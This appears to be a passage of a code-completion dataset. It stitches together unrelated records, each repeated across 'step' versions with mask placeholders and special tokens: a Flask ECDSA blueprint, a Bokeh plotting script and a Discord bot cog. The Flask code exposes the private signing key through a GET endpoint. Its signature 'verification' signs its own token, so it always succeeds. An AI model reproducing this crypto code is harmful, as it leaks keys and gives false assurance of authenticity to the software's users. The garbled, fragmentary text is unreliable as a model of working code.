"step-5": "from flask import Blueprint, request\nfrom ecdsa import SigningKey, NIST384p\nimport base64, codecs\nfrom cryptography.fernet import Fernet\n\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\n\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n #reverse = bytes.fromhex(sk.to_string().hex()) \n return {\"status\":\"success\", \"result\":sk.to_string().hex()}\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n #reverse_signature = bytes.fromhex(input[\"signature\"])\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if (vk.verify(signature_, token)):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput ={}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input[\"signature\"])\n return (vk.verify(reverse_signature, token))\n except:\n pass\n\n ",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
<|reserved_special_token_0|>
output_file('totals.html', title='Totals')
<|reserved_special_token_0|>
show(totals)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
summary = read_summary('PT19DW.7.json')
output_file('totals.html', title='Totals')
totals = plot_totals(summary)
show(totals)
<|reserved_special_token_1|>
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
summary = read_summary('PT19DW.7.json')
output_file('totals.html', title='Totals')
totals = plot_totals(summary)
show(totals)
<|reserved_special_token_1|>
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
# from bokeh.io import export_svgs
def read_summary(summary_file):
return json.loads(open(summary_file, "r").read())
def get_descriptions(summary):
d = {}
for o in summary["ontology_events"]:
print(o)
d[o] = summary["ontology_events"][o].get(
'description', summary["ontology_events"][o]['method']) + '_' + str(o)
return(d)
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [],
'rxns': [],
'terms': []}
# genes
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
# terms
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
# rxns
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
# sums
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events,
'genes': gene_counts,
'terms': term_counts,
'rxns': rxn_counts
}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x),
plot_height=400,
plot_width=1000,
title="Unique Counts per Annotation Event",
tools="wheel_zoom,box_zoom,reset,save")
p.hbar(y='x',
right='counts',
height=0.9,
source=source,
line_color="black",
fill_color=factor_cmap('x',
palette=inferno(len(types)),
factors=types,
start=1,
end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = "horizontal"
p.yaxis.subgroup_label_orientation = "horizontal"
p.yaxis.group_label_orientation = "horizontal"
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = "12pt"
p.yaxis.major_label_text_font_size = "12pt"
p.yaxis.group_text_font_size = "12pt"
p.add_tools(HoverTool(tooltips=[("Type", "@x"), ("Count", "@counts")]))
return(p)
#summary = read_summary("PT19DW.5.json")
summary = read_summary("PT19DW.7.json")
output_file("totals.html", title="Totals")
totals = plot_totals(summary)
show(totals)
|
flexible
|
{
"blob_id": "7036ae5f74e6cb04518c20bb52122a1dfae76f23",
"index": 712,
"step-1": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\noutput_file('totals.html', title='Totals')\n<mask token>\nshow(totals)\n",
"step-3": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-4": "import json\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-5": "import json\n\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n# from bokeh.io import export_svgs\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, \"r\").read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary[\"ontology_events\"]:\n print(o)\n d[o] = summary[\"ontology_events\"][o].get(\n 'description', summary[\"ontology_events\"][o]['method']) + '_' + str(o)\n return(d)\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [],\n 'rxns': [],\n 'terms': []}\n\n # genes\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n\n # terms\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n\n # rxns\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n\n # sums\n events = []\n types = ['genes', 'terms', 'rxns']\n\n gene_counts = []\n rxn_counts = []\n term_counts = []\n\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n\n data = {'events': events,\n 'genes': gene_counts,\n 'terms': term_counts,\n 'rxns': rxn_counts\n }\n\n x = [(event, type) for event in events for type in types]\n\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n\n p = figure(y_range=FactorRange(*x),\n plot_height=400,\n plot_width=1000,\n title=\"Unique Counts per Annotation Event\",\n tools=\"wheel_zoom,box_zoom,reset,save\")\n\n p.hbar(y='x',\n right='counts',\n height=0.9,\n source=source,\n line_color=\"black\",\n fill_color=factor_cmap('x',\n palette=inferno(len(types)),\n factors=types,\n start=1,\n end=2))\n\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = \"horizontal\"\n p.yaxis.subgroup_label_orientation = \"horizontal\"\n p.yaxis.group_label_orientation = \"horizontal\"\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.group_text_font_size = \"12pt\"\n p.add_tools(HoverTool(tooltips=[(\"Type\", \"@x\"), (\"Count\", \"@counts\")]))\n\n return(p)\n\n\n#summary = read_summary(\"PT19DW.5.json\")\nsummary = read_summary(\"PT19DW.7.json\")\n\noutput_file(\"totals.html\", title=\"Totals\")\ntotals = plot_totals(summary)\n\nshow(totals)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class Staff(commands.Cog):
<|reserved_special_token_0|>
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='stop', aliases=['shutdown'], description=
'This is a command for staff only to stop the bot')
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send("Oh, alright... I'll just shutup I guess.. :wave:")
await self.bot.close()
<|reserved_special_token_1|>
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(
name='stop',
aliases=['shutdown'],
description='This is a command for staff only to stop the bot'
)
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send('Oh, alright... I\'ll just shutup I guess.. :wave:')
await self.bot.close()
|
flexible
|
{
"blob_id": "23b2cc5b561a11ae7757a281a141491d5b7e23ca",
"index": 2683,
"step-1": "<mask token>\n\n\nclass Staff(commands.Cog):\n <mask token>\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-2": "<mask token>\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-3": "<mask token>\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-4": "from discord.ext import commands\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
